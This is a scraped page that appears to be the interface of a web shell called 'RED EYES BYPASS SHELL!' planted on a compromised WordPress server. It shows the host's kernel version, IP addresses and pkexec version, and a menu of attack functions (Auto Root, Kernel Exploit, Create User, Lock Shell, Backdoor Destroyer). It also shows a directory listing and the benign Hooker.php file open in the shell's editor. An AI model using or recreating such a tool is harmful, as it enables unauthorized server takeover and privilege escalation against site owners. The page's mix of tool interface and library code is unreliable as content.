Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
techno /
wp-includes /
Requests /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
Auth
[ DIR ]
drwxr-xr-x
Cookie
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Proxy
[ DIR ]
drwxr-xr-x
Response
[ DIR ]
drwxr-xr-x
Transport
[ DIR ]
drwxr-xr-x
Utility
[ DIR ]
drwxr-xr-x
Auth.php
810
B
-rwxr-xr-x
Cookie.php
12.73
KB
-rwxr-xr-x
Exception.php
1
KB
-rwxr-xr-x
Hooker.php
709
B
-rwxr-xr-x
Hooks.php
1.37
KB
-rwxr-xr-x
IDNAEncoder.php
11.28
KB
-rwxr-xr-x
IPv6.php
4.89
KB
-rwxr-xr-x
IRI.php
27.88
KB
-rwxr-xr-x
Proxy.php
813
B
-rwxr-xr-x
Response.php
2.46
KB
-rwxr-xr-x
SSL.php
3.72
KB
-rwxr-xr-x
Session.php
7
KB
-rwxr-xr-x
Transport.php
1.19
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Hooker.php
<?php /** * Event dispatcher * * @package Requests * @subpackage Utilities */ /** * Event dispatcher * * @package Requests * @subpackage Utilities */ interface Requests_Hooker { /** * Register a callback for a hook * * @param string $hook Hook name * @param callback $callback Function/method to call on event * @param int $priority Priority number. <0 is executed earlier, >0 is executed later */ public function register($hook, $callback, $priority = 0); /** * Dispatch a message * * @param string $hook Hook name * @param array $parameters Parameters to pass to callbacks * @return boolean Successfulness */ public function dispatch($hook, $parameters = array()); }
Close